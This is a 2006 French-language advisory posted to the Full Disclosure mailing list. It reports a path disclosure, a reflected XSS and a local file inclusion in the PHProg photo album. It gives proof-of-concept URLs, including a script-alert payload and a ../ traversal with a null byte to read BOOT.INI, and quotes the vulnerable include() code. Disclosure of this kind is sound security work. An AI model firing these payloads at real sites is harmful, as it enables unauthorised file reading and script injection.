|
Full Disclosure
mailing list archives
PHProg : Local File Inclusion + XSS + Full path disclosure
From: ... <cdg393 () gmail com>
Date: Mon, 11 Sep 2006 11:03:49 +0200
(11/09/06)
* Produit vulnérable : PHProg ( Album photo en PHP )
* Site officiel du produit : http://www.PHProg.com/
* Failles de sécurité décelées :
1] Full path disclosure : http://localhost/PHProg/?id=1&album=cdg393
2] Cross Site Scripting ( XSS ) : http://localhost/PHProg/?id=1&album=
<script>alert('cdg393')</script>
3] Local File Inclusion :
http://localhost/PHProg/index.php?lang=../../../../../../BOOT.INI%00
Ligne 59 => $lang=$_GET['lang'];
Ligne 61 => include("lang/$lang.php");
* Credits : cdg393 : cdg.new.fr =)
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
By Date
By Thread
Current thread:
- PHProg : Local File Inclusion + XSS + Full path disclosure . . . (Sep 11)
|